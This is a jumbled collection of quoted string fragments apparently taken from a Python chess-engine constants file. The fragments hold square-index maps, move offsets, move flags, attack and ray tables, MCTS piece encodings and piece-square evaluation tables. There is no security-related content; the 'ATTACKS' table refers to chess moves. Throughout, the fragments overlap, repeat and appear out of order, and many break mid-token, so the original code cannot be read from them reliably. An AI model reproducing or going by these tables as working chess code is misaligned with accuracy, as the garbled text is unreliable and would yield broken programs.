'a3': 80, 'b3': 81, 'c3': 82, 'd3': 83, 'e3': 84,", "= ['1-0', '0-1', '1/2-1/2', '*'] # Directions pawns can move: forward 1, forward", "0, 0, 0,20, 0, 0, 0, 0, 0, 0, 20, 0, 0, 0,", "0, 0, 0, 0, 0, 0, 0, 17, 0, 16, 0, 15, 0,", "'g7': 22, 'h7': 23, 'a6': 32, 'b6': 33, 'c6': 34, 'd6': 35, 'e6':", "0, 0, 0, 0, 0, 0, 0,20, 2, 24, 2,20, 0, 0, 0,", "0, 0, 0, 0, 0,-17, 0, 0, -15, 0, 0, 0, 0, 0,", "-3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -3.0, -4.0, -4.0, -5.0,", "0.0, 0.0, 0.0, 0.0, 0.0], [ 0.5, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,", "0, 0, 0, 0, 17, 0, 0, 0, 16, 0, 0, 0, 15,", "-0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [ -0.5, 0.0,", "5.0, 5.0, 5.0], [1.0, 1.0, 2.0, 3.0, 3.0, 2.0, 1.0, 1.0], [0.5, 0.5,", "'e1': 116, 'f1': 117, 'g1': 118, 'h1': 119 } ROOKS = { 'w':", "16, -1], 'q': [-17, -16, -15, 1, 17, 16, 15, -1], 'k': [-17,", "= [ [ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0], [ -1.0,", "-1.0], [ -1.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [ -0.5, 0.0,", "0, 0, 0, 0, 0,-15, 0, 0, 0,-16, 0, 0, 0,-17, 0, 0,", "0,-16, 0, 0, 0, 0, 0, 0,-17 ] SHIFTS = { 'p': 0,", "0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0], [ -1.0, 0.0, 0.5, 0.5, 0.5,", "1.0, 0.5, 0.5, -1.0], [ -1.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0, -1.0],", "-1.0, -1.0, -2.0] ] KNIGHT_EVAL = [ [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0,", "0.5, 1.0, 2.5, 2.5, 1.0, 0.5, 0.5], [0.0, 0.0, 0.0, 2.0, 2.0, 0.0,", "0.0, 2.0, 2.0, 0.0, 0.0, 0.0], [0.5, -0.5, -1.0, 0.0, 0.0, -1.0, -0.5,", "'r': [-16, 1, 16, -1], 'q': [-17, -16, -15, 1, 17, 16, 15,", "= 7 RANK_2 = 6 RANK_3 = 5 RANK_4 = 4 RANK_5 =", "{ 'NORMAL': 1, 'CAPTURE': 2, 'BIG_PAWN': 4, 'EP_CAPTURE': 8, 'PROMOTION': 16, 'KSIDE_CASTLE': 32,", "0, 0, 0, 0, 24, 0, 0, 0, 0, 0,20, 0, 0, 20,0,", "0, 0, 0, 24,24,24,24,24,24,56, 0, 56,24,24,24,24,24,24, 0, 0, 0, 0, 0, 0, 2,53,", "'q' KING = 'k' SYMBOLS = 'pnbrqkPNBRQK' DEFAULT_POSITION = 'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq -", "0, 0,20, 0, 0, 0, 0, 0, 0, 0, 0,20, 0, 0, 0,", "0.0, 0.0, 0.0, -2.0, -4.0], [-3.0, 0.0, 1.0, 1.5, 1.5, 1.0, 0.0, -3.0],", "-1.0, -0.5, 0.5], [0.5, 1.0, 1.0, -2.0, -2.0, 1.0, 1.0, 0.5], [0.0, 0.0,", "0, 0, 0, 0, 0, 0, 0,20, 0, 0, 0, 24, 0, 0,", "0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1,", "'r', 5 : 'q', 6 : 'k' } MCTS_COLOR_MAP = { 'w' :", "[ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0], [ -1.0, 0.0, 0.0,", "'c6': 34, 'd6': 35, 'e6': 36, 'f6': 37, 'g6': 38, 'h6': 39, 'a5':", "102, 'h2': 103, 'a1': 112, 'b1': 113, 'c1': 114, 'd1': 115, 'e1': 116,", "0, 0,20, 0, 0, 0, 24, 0, 0, 0,20, 0, 0, 0, 0,", "0, 0, 0, 0, 0, 0, 0,-15,-16,-17, 0, 0, 0, 0, 0, 0,", "-5.0, -5.0, -4.0, -4.0, -3.0], [ -2.0, -3.0, -3.0, -4.0, -4.0, -3.0, -3.0,", "right (capture), left (capture) PAWN_OFFSETS = { 'b': [16, 32, 17, 15], 'w':", "0, 0, 24, 0, 0, 0, 0, 0, 0,20 ] RAYS = [", "[1.0, 1.0, 2.0, 3.0, 3.0, 2.0, 1.0, 1.0], [0.5, 0.5, 1.0, 2.5, 2.5,", "23, 'a6': 32, 'b6': 33, 'c6': 34, 'd6': 35, 'e6': 36, 'f6': 37,", "'f1': 117, 'g1': 118, 'h1': 119 } ROOKS = { 'w': [{'square': SQUARES['a1'],", "0, 0, 0, 0, 0, 0, 0, 0,20, 0, 0, 0, 24, 0,", "0, 0, 0, 24, 0, 0, 0, 0, 0,20, 0, 0, 0, 0,", "0, 0, 0, 0, 0, 0,20, 0, 0, 20,0, 0, 0, 0, 0,", "-5.0, -4.0, -4.0, -3.0], [ -2.0, -3.0, -3.0, -4.0, -4.0, -3.0, -3.0, -2.0],", "0, 0, 0, 0, 15, 0, 0, 0, 0, 17, 0, 0, 0,", "15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 17, 0,", "0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [ 0.0, 0.0, 0.5, 0.5, 0.5,", "0, 0,-16, 0, 0, 0, 0,-17, 0, 0, 0, 0,-15, 0, 0, 0,", "'a1': 112, 'b1': 113, 'c1': 114, 'd1': 115, 'e1': 116, 'f1': 117, 'g1':", "-0.5, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [ 0.0, 0.0, 0.5, 0.5,", "0.0, 0.0, 0.5, 0.5, 0.0, 0.0, 0.0] ] BISHOP_EVAL = [ [ -2.0,", "[ 0.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [ -1.0, 0.5, 0.5,", "-1, -1,-1, -1, -1, -1, 0, 0, 0, 0, 0, 0, 0,-15,-16,-17, 0,", "'QSIDE_CASTLE': 'q' } BITS = { 'NORMAL': 1, 'CAPTURE': 2, 'BIG_PAWN': 4, 'EP_CAPTURE':", "0, 0,-17, 0, 0, 0, 0, 0, 0, 0, 0,-15, 0, 0, 0,-16,", "'b': [-17, -15, 17, 15], 'r': [-16, 1, 16, -1], 'q': [-17, -16,", "0.5, 0.0, 0.0, 0.0, 0.0, 0.5, -1.0], [ -2.0, -1.0, -1.0, -1.0, -1.0,", "0, 0, 0, 15, 0, 0, 0, 0, 17, 0, 0, 0, 0,", "1.5, 1.5, 1.0, 0.0, -3.0], [-3.0, 0.5, 1.5, 2.0, 2.0, 1.5, 0.5, -3.0],", "0, 0, 0,-15, 0, 0, 0, 0,-16, 0, 0, 0, 0,-17, 0, 0,", "0, 0, 0, 0, 0, 15, 0, 0, 17, 0, 0, 0, 0,", "5, 'k' : 6, } MCTS_DECODER = { 1 : 'p', 2 :", "-1.0], [ -1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, -1.0], [ -1.0, 0.5,", "0, 0, 0, 16, 0, 0, 0, 15, 0, 0, 0, 0, 0,", "0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 15, 0,", "0,20, 0, 0, 0, 0, 0, 0, 20, 0, 0, 0, 0, 24,", "0, 17, 0, 16, 0, 15, 0, 0, 0, 0, 0, 0, 0,", "15], 'w': [-16, -32, -17, -15] } # Directions different pieces can move", "0.0, 0.0, -1.0], [ -1.0, 0.0, 0.5, 1.0, 1.0, 0.5, 0.0, -1.0], [", "-4.0, -3.0], [ -2.0, -3.0, -3.0, -4.0, -4.0, -3.0, -3.0, -2.0], [ -1.0,", "-5.0, -4.0, -4.0, -3.0], [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0],", "0.0, 2.0, 2.0 ], [ 2.0, 3.0, 1.0, 0.0, 0.0, 1.0, 3.0, 2.0", "-4.0, -5.0] ] PAWN_EVAL = [ [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,", "1, 1, 1, 1, 1, 1, 1, 0, -1, -1, -1,-1, -1, -1,", "0, 0, 0,-15, 0, 0, 0,-16, 0, 0, 0,-17, 0, 0, 0, 0,", "0, 0, 0,-16, 0, 0, 0, 0, 0, 0,-17 ] SHIFTS = {", "0.0, 0.0, -2.0, -4.0], [-3.0, 0.0, 1.0, 1.5, 1.5, 1.0, 0.0, -3.0], [-3.0,", "0.0, -1.0], [ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0] ] ROOK_EVAL", "24, 0, 0, 0, 0, 0, 0,20, 0, 0, 20,0, 0, 0, 0,", "'c8': 2, 'd8': 3, 'e8': 4, 'f8': 5, 'g8': 6, 'h8': 7, 'a7':", "0, 0,-17, 0, 0, -15, 0, 0, 0, 0, 0, 0,-16, 0, 0,", "7 RANK_2 = 6 RANK_3 = 5 RANK_4 = 4 RANK_5 = 3", "RAYS = [ 17, 0, 0, 0, 0, 0, 0, 16, 0, 0,", "16, 0, 0, 0, 0, 0, 0, 15, 0, 0, 17, 0, 0,", "-1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0], [ -1.0, 0.0, 0.0, 0.0, 0.0,", "0, 0, 0, 0, 15, 0, 0, 17, 0, 0, 0, 0, 0,", "0, 0, 0, 0, 0, 0, 0, 0, 17, 16, 15, 0, 0,", "0, 0, 0, 24, 0, 0, 0,20, 0, 0, 0, 0, 0, 0,", "0.0, -1.0], [ -0.5, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [ 0.0,", "83, 'e3': 84, 'f3': 85, 'g3': 86, 'h3': 87, 'a2': 96, 'b2': 97,", "0, 0, 0, 0, 0, 0,-16, 0, 0, 0, 0, 0, 0,-17 ]", "] QUEEN_EVAL = [ [ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0],", "0,20, 0, 0, 0, 0, 20, 0, 0, 0, 0, 24, 0, 0,", "0,-15, 0, 0,-16, 0, 0,-17, 0, 0, 0, 0, 0, 0, 0, 0,-15,", "{ 'p': 0, 'n': 1, 'b': 2, 'r': 3, 'q': 4, 'k': 5", "0.0, 0.0, -0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [", "0, 0, 0, 0, 0,20, 0, 0, 20,0, 0, 0, 0, 0, 0,", "1.5, 1.0, 0.5, -3.0], [-4.0, -2.0, 0.0, 0.5, 0.5, 0.0, -2.0, -4.0], [-5.0,", "'a2': 96, 'b2': 97, 'c2': 98, 'd2': 99, 'e2': 100, 'f2': 101, 'g2':", "[-3.0, 0.5, 1.0, 1.5, 1.5, 1.0, 0.5, -3.0], [-4.0, -2.0, 0.0, 0.5, 0.5,", "-1.0, 0.0, 0.5, 1.0, 1.0, 0.5, 0.0, -1.0], [ -1.0, 0.5, 0.5, 1.0,", "0.0, 0.0], [ 0.5, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.5], [ -0.5,", "= 4 RANK_5 = 3 RANK_6 = 2 RANK_7 = 1 RANK_8 =", "0, 0, 0, 0, 0, 0, 0, 0, 0, 17, 0, 16, 0,", "= [ 20,0, 0, 0, 0, 0, 0, 24, 0, 0, 0, 0,", "0,20, 0, 0, 24, 0, 0,20, 0, 0, 0, 0, 0, 0, 0,", "0.5, -3.0], [-4.0, -2.0, 0.0, 0.5, 0.5, 0.0, -2.0, -4.0], [-5.0, -4.0, -3.0,", "15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,", ": 4, 'q' : 5, 'k' : 6, } MCTS_DECODER = { 1", "0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 17, 16,", "87, 'a2': 96, 'b2': 97, 'c2': 98, 'd2': 99, 'e2': 100, 'f2': 101,", "-1.0], [ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0] ] ROOK_EVAL =", "BITS['QSIDE_CASTLE']}, {'square': SQUARES['h8'], 'flag': BITS['KSIDE_CASTLE']}] } KING_EVAL = [ [ -3.0, -4.0, -4.0,", "0.0, 0.0, 0.0, 0.0, -1.0], [ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0,", "'f6': 37, 'g6': 38, 'h6': 39, 'a5': 48, 'b5': 49, 'c5': 50, 'd5':", "0.0], [ 0.5, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.5], [ -0.5, 0.0,", "FLAGS = { 'NORMAL': 'n', 'CAPTURE': 'c', 'BIG_PAWN': 'b', 'EP_CAPTURE': 'e', 'PROMOTION': 'p',", "53, 'g5': 54, 'h5': 55, 'a4': 64, 'b4': 65, 'c4': 66, 'd4': 67,", "24, 0, 0, 0, 0,20, 0, 0, 0, 0, 0, 0,20, 0, 0,", "0, 0, 0, 0,-15, 0, 0,-16, 0, 0,-17, 0, 0, 0, 0, 0,", "0, 16, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "Directions different pieces can move PIECE_OFFSETS = { 'n': [-18, -33, -31, -14,", "'b': [{'square': SQUARES['a8'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h8'], 'flag': BITS['KSIDE_CASTLE']}] } KING_EVAL = [", "119 } ROOKS = { 'w': [{'square': SQUARES['a1'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h1'], 'flag':", "-2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0], [ -1.0, 0.0, 0.0, 0.0,", "1.0, 1.0, 1.0, 0.0, -1.0], [ -1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,", "'n' : 2, 'b' : 3, 'r' : 4, 'q' : 5, 'k'", "1, 1, 1, 1, 1, 1, 0, -1, -1, -1,-1, -1, -1, -1,", "0, 0, 0, 0, 0, 17, 0, 0, 0, 16, 0, 0, 0,", "20,0, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0,20, 0, 0,", "[ -1.0, 0.0, 0.5, 1.0, 1.0, 0.5, 0.0, -1.0], [ -1.0, 0.5, 0.5,", "0, 0,-16, 0, 0, 0, 0, 0, 0,-17 ] SHIFTS = { 'p':", "-2.0, -3.0, -3.0, -4.0, -4.0, -3.0, -3.0, -2.0], [ -1.0, -2.0, -2.0, -2.0,", "BISHOP_EVAL = [ [ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0], [", "[ -1.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0, -1.0], [ -1.0, 1.0, 1.0,", "0,-16, 0,-17, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-15, 0,", "BOARD CONSTANTS ####################################################### BLACK = 'b' WHITE = 'w' EMPTY = -1 PAWN", "'f2': 101, 'g2': 102, 'h2': 103, 'a1': 112, 'b1': 113, 'c1': 114, 'd1':", ": 3, 'r' : 4, 'q' : 5, 'k' : 6, } MCTS_DECODER", "115, 'e1': 116, 'f1': 117, 'g1': 118, 'h1': 119 } ROOKS = {", "'b7': 17, 'c7': 18, 'd7': 19, 'e7': 20, 'f7': 21, 'g7': 22, 'h7':", "'c1': 114, 'd1': 115, 'e1': 116, 'f1': 117, 'g1': 118, 'h1': 119 }", "'g6': 38, 'h6': 39, 'a5': 48, 'b5': 49, 'c5': 50, 'd5': 51, 'e5':", "0.0, 0.0, 2.0, 2.0, 0.0, 0.0, 0.0], [0.5, -0.5, -1.0, 0.0, 0.0, -1.0,", "17, 16, 15, -1] } MCTS_MAPPING = { 'p' : 1, 'n' :", "{ 1 : 'p', 2 : 'n', 3 : 'b', 4 : 'r',", "[ 0.5, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.5], [ -0.5, 0.0, 0.0,", "0, 0, 0, 0, 0, 0,20, 0, 0, 24, 0, 0,20, 0, 0,", "'a6': 32, 'b6': 33, 'c6': 34, 'd6': 35, 'e6': 36, 'f6': 37, 'g6':", "-0.5, -1.0, -1.0, -2.0], [ -1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0],", "'k': [-17, -16, -15, 1, 17, 16, 15, -1] } MCTS_MAPPING = {", "0.0, 0.0, 0.0, -1.0], [ -1.0, 0.0, 0.5, 1.0, 1.0, 0.5, 0.0, -1.0],", "0, 0,20, 0, 0, 20,0, 0, 0, 0, 0, 24, 0, 0, 0,", "24, 0, 0,20, 0, 0, 0, 0, 0, 0, 0, 0,20, 0, 0,", "2, 24, 2,20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "0,-17, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-15, 0, 0,-16,", "0, 0, 0, 0, 0, 0, 0, 0, 0,-15, 0, 0,-16, 0, 0,-17,", "pawns can move: forward 1, forward 2, right (capture), left (capture) PAWN_OFFSETS =", "0, 0, 0, 0, 15, 0, 0, 0, 0, 0, 0, 17, 0,", "= 5 RANK_4 = 4 RANK_5 = 3 RANK_6 = 2 RANK_7 =", "-33, -31, -14, 18, 33, 31, 14], 'b': [-17, -15, 17, 15], 'r':", "-1.0], [ -0.5, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [ 0.0, 0.0,", "0, 0, 0, 0, 16, 0, 0, 0, 0, 15, 0, 0, 0,", "= 1 RANK_8 = 0 SQUARES = { 'a8': 0, 'b8': 1, 'c8':", "0.5, 0.5, 0.0, -2.0, -4.0], [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0]", "84, 'f3': 85, 'g3': 86, 'h3': 87, 'a2': 96, 'b2': 97, 'c2': 98,", "64 } RANK_1 = 7 RANK_2 = 6 RANK_3 = 5 RANK_4 =", "'h3': 87, 'a2': 96, 'b2': 97, 'c2': 98, 'd2': 99, 'e2': 100, 'f2':", "0.0, -1.0], [ -1.0, 0.0, 0.5, 0.0, 0.0, 0.0, 0.0, -1.0], [ -2.0,", "15], 'r': [-16, 1, 16, -1], 'q': [-17, -16, -15, 1, 17, 16,", "= { 'NORMAL': 1, 'CAPTURE': 2, 'BIG_PAWN': 4, 'EP_CAPTURE': 8, 'PROMOTION': 16, 'KSIDE_CASTLE':", "0, 0, 0, 20,0, 0, 0, 0, 0, 24, 0, 0, 0, 0,", "24, 0, 0, 0, 0, 0,20, 0, 0, 20,0, 0, 0, 0, 0,", "4, 'k': 5 } FLAGS = { 'NORMAL': 'n', 'CAPTURE': 'c', 'BIG_PAWN': 'b',", "-5.0] ] PAWN_EVAL = [ [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],", "'CAPTURE': 'c', 'BIG_PAWN': 'b', 'EP_CAPTURE': 'e', 'PROMOTION': 'p', 'KSIDE_CASTLE': 'k', 'QSIDE_CASTLE': 'q' }", "KING = 'k' SYMBOLS = 'pnbrqkPNBRQK' DEFAULT_POSITION = 'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0", "-1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0], [ -1.0, 0.0, 0.5, 1.0,", "0,-17, 0, 0, -15, 0, 0, 0, 0, 0, 0,-16, 0, 0, 0,", "32, 'QSIDE_CASTLE': 64 } RANK_1 = 7 RANK_2 = 6 RANK_3 = 5", "], [ 2.0, 3.0, 1.0, 0.0, 0.0, 1.0, 3.0, 2.0 ] ] QUEEN_EVAL", "0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [ -0.5, 0.0, 0.5, 0.5, 0.5, 0.5,", "0, 0, 0, 15, 0, 0, 0, 0, 0, 0, 17, 0, 0,", "0, 0, 0, 17, 16, 15, 0, 0, 0, 0, 0, 0, 0,", "0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 17, 16, 15,", "-3.0, -3.0, -3.0, -4.0, -5.0], [-4.0, -2.0, 0.0, 0.0, 0.0, 0.0, -2.0, -4.0],", "'q', 6 : 'k' } MCTS_COLOR_MAP = { 'w' : 1, 'b' :", "-3.0], [-4.0, -2.0, 0.0, 0.5, 0.5, 0.0, -2.0, -4.0], [-5.0, -4.0, -3.0, -3.0,", "17, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 15,", "-0.5, -0.5, -1.0, -1.0, -2.0], [ -1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,", "'g5': 54, 'h5': 55, 'a4': 64, 'b4': 65, 'c4': 66, 'd4': 67, 'e4':", "0.0, 0.5, 0.5, 0.0, -2.0, -4.0], [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0,", "1.5, 0.5, -3.0], [-3.0, 0.0, 1.5, 2.0, 2.0, 1.5, 0.0, -3.0], [-3.0, 0.5,", "0, 16, 0, 0, 0, 0, 0, 15, 0, 0, 0, 0, 17,", "17, 0, 0, 16, 0, 0, 15, 0, 0, 0, 0, 0, 0,", "0.0, 0.0, 0.0], [5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0], [1.0, 1.0,", "20,0, 0, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0, 0,20", "0,-16, 0, 0, 0, 0, 0,-17, 0, 0, -15, 0, 0, 0, 0,", "53, 2, 0, 0, 0, 0, 0, 0, 24,24,24,24,24,24,56, 0, 56,24,24,24,24,24,24, 0, 0,", "'flag': BITS['KSIDE_CASTLE']}], 'b': [{'square': SQUARES['a8'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h8'], 'flag': BITS['KSIDE_CASTLE']}] } KING_EVAL", "-1.0, -1.0, -1.0, -1.0, -1.0, -2.0], [ -1.0, 0.0, 0.0, 0.0, 0.0, 0.0,", "= [ 17, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0,", "1.0, 3.0, 2.0 ] ] QUEEN_EVAL = [ [ -2.0, -1.0, -1.0, -0.5,", "1.5, 2.0, 2.0, 1.5, 0.0, -3.0], [-3.0, 0.5, 1.0, 1.5, 1.5, 1.0, 0.5,", "[ [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -3.0, -4.0,", "MCTS_COLOR_MAP = { 'w' : 1, 'b' : -1 } ATTACKS = [", "-4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0,", "RANK_6 = 2 RANK_7 = 1 RANK_8 = 0 SQUARES = { 'a8':", "'k': 5 } FLAGS = { 'NORMAL': 'n', 'CAPTURE': 'c', 'BIG_PAWN': 'b', 'EP_CAPTURE':", "4 : 'r', 5 : 'q', 6 : 'k' } MCTS_COLOR_MAP = {", "2,20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2,53,", "-1, -1, -1, 0, 0, 0, 0, 0, 0, 0,-15,-16,-17, 0, 0, 0,", "114, 'd1': 115, 'e1': 116, 'f1': 117, 'g1': 118, 'h1': 119 } ROOKS", "[0.0, 0.0, 0.0, 2.0, 2.0, 0.0, 0.0, 0.0], [0.5, -0.5, -1.0, 0.0, 0.0,", "'a5': 48, 'b5': 49, 'c5': 50, 'd5': 51, 'e5': 52, 'f5': 53, 'g5':", "-15, 17, 15], 'r': [-16, 1, 16, -1], 'q': [-17, -16, -15, 1,", "0.5], [0.5, 1.0, 1.0, -2.0, -2.0, 1.0, 1.0, 0.5], [0.0, 0.0, 0.0, 0.0,", "81, 'c3': 82, 'd3': 83, 'e3': 84, 'f3': 85, 'g3': 86, 'h3': 87,", "[ 2.0, 3.0, 1.0, 0.0, 0.0, 1.0, 3.0, 2.0 ] ] QUEEN_EVAL =", "'1/2-1/2', '*'] # Directions pawns can move: forward 1, forward 2, right (capture),", "'b' : 3, 'r' : 4, 'q' : 5, 'k' : 6, }", "5 : 'q', 6 : 'k' } MCTS_COLOR_MAP = { 'w' : 1,", "0, 0,-16, 0, 0,-17, 0, 0, 0, 0, 0, 0, 0, 0,-15, 0,", "SQUARES['h8'], 'flag': BITS['KSIDE_CASTLE']}] } KING_EVAL = [ [ -3.0, -4.0, -4.0, -5.0, -5.0,", "54, 'h5': 55, 'a4': 64, 'b4': 65, 'c4': 66, 'd4': 67, 'e4': 68,", "QUEEN_EVAL = [ [ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0], [", "pieces can move PIECE_OFFSETS = { 'n': [-18, -33, -31, -14, 18, 33,", "0, 0, 0, 0, 0, 0, 0, 0, 0, 17, 16, 15, 0,", "0.5, 0.0, -1.0], [ -1.0, 0.0, 0.5, 0.0, 0.0, 0.0, 0.0, -1.0], [", "0, 24, 0, 0, 0, 0, 0,20, 0, 0, 20,0, 0, 0, 0,", "2.0, 2.0 ], [ 2.0, 3.0, 1.0, 0.0, 0.0, 1.0, 3.0, 2.0 ]", "1, 0, -1, -1, -1,-1, -1, -1, -1, 0, 0, 0, 0, 0,", "0, 0, 0, 0, 0, 0,-17 ] SHIFTS = { 'p': 0, 'n':", "2,20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,20, 0, 0,", "-0.5, 0.5], [0.5, 1.0, 1.0, -2.0, -2.0, 1.0, 1.0, 0.5], [0.0, 0.0, 0.0,", "{ 'n': [-18, -33, -31, -14, 18, 33, 31, 14], 'b': [-17, -15,", "'e8': 4, 'f8': 5, 'g8': 6, 'h8': 7, 'a7': 16, 'b7': 17, 'c7':", "'p' KNIGHT = 'n' BISHOP = 'b' ROOK = 'r' QUEEN = 'q'", "0, 0, 0, 0,-16, 0, 0, 0, 0, 0, 0,-17 ] SHIFTS =", "0, 0, 0, 0,20, 0, 0, 20,0, 0, 0, 0, 0, 24, 0,", "{ 'w': [{'square': SQUARES['a1'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h1'], 'flag': BITS['KSIDE_CASTLE']}], 'b': [{'square': SQUARES['a8'],", "-1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, -1.0], [ -1.0, 0.5, 0.0, 0.0,", "0.0, -1.0], [ -1.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [ -0.5,", "'a3': 80, 'b3': 81, 'c3': 82, 'd3': 83, 'e3': 84, 'f3': 85, 'g3':", "} BITS = { 'NORMAL': 1, 'CAPTURE': 2, 'BIG_PAWN': 4, 'EP_CAPTURE': 8, 'PROMOTION':", "0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0,", "0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [ -0.5, 0.0, 0.5, 0.5, 0.5,", "0, 0, 0, 0, 0, 15, 0, 0, 0, 0, 17, 0, 0,", "24, 0, 0, 0,20, 0, 0, 0, 0, 0, 0, 20, 0, 0,", "'n', 'CAPTURE': 'c', 'BIG_PAWN': 'b', 'EP_CAPTURE': 'e', 'PROMOTION': 'p', 'KSIDE_CASTLE': 'k', 'QSIDE_CASTLE': 'q'", "[ -1.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [ -0.5, 0.0, 0.5,", "0, 0, 0, 0, 0, 0, 17, 0, 0, 16, 0, 0, 15,", "'g4': 70, 'h4': 71, 'a3': 80, 'b3': 81, 'c3': 82, 'd3': 83, 'e3':", "15, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1,", "0.0, 0.0, 0.0, -0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5],", "POSSIBLE_RESULTS = ['1-0', '0-1', '1/2-1/2', '*'] # Directions pawns can move: forward 1,", "2.0, 2.0, 0.0, 0.0, 0.0, 0.0, 2.0, 2.0 ], [ 2.0, 3.0, 1.0,", "0, -1, -1, -1,-1, -1, -1, -1, 0, 0, 0, 0, 0, 0,", "0.0, 0.0, 0.0, 0.5, 0.5, 0.0, 0.0, 0.0] ] BISHOP_EVAL = [ [", "24, 0, 0, 0, 0, 0, 0,20 ] RAYS = [ 17, 0,", "'e6': 36, 'f6': 37, 'g6': 38, 'h6': 39, 'a5': 48, 'b5': 49, 'c5':", "0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [ 0.0, 0.0, 0.0, 0.5, 0.5,", "-3.0], [ -2.0, -3.0, -3.0, -4.0, -4.0, -3.0, -3.0, -2.0], [ -1.0, -2.0,", "-4.0, -4.0, -3.0, -3.0, -2.0], [ -1.0, -2.0, -2.0, -2.0, -2.0, -2.0, -2.0,", "'b4': 65, 'c4': 66, 'd4': 67, 'e4': 68, 'f4': 69, 'g4': 70, 'h4':", "forward 1, forward 2, right (capture), left (capture) PAWN_OFFSETS = { 'b': [16,", "0, 0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 16, 0,", "0, 0, 0, 0, 0, 17, 0, 0, 16, 0, 0, 15, 0,", "0, 0, 17, 0, 16, 0, 15, 0, 0, 0, 0, 0, 0,", "0.5, 0.0, -0.5], [ -1.0, 0.5, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [", "0, 0,20 ] RAYS = [ 17, 0, 0, 0, 0, 0, 0,", "0, 0,-17, 0, 0, 0, 0,-15, 0, 0, 0, 0, 0,-16, 0, 0,", "1.0, 0.0, 0.0, 1.0, 3.0, 2.0 ] ] QUEEN_EVAL = [ [ -2.0,", "[ -1.0, 0.5, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [ -1.0, 0.0, 0.5,", "49, 'c5': 50, 'd5': 51, 'e5': 52, 'f5': 53, 'g5': 54, 'h5': 55,", "0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-15, 0,-16, 0,-17,", "0, 0, 0,-15, 0, 0, 0, 0, 0,-16, 0, 0, 0, 0, 0,-17,", "0, 0,-15, 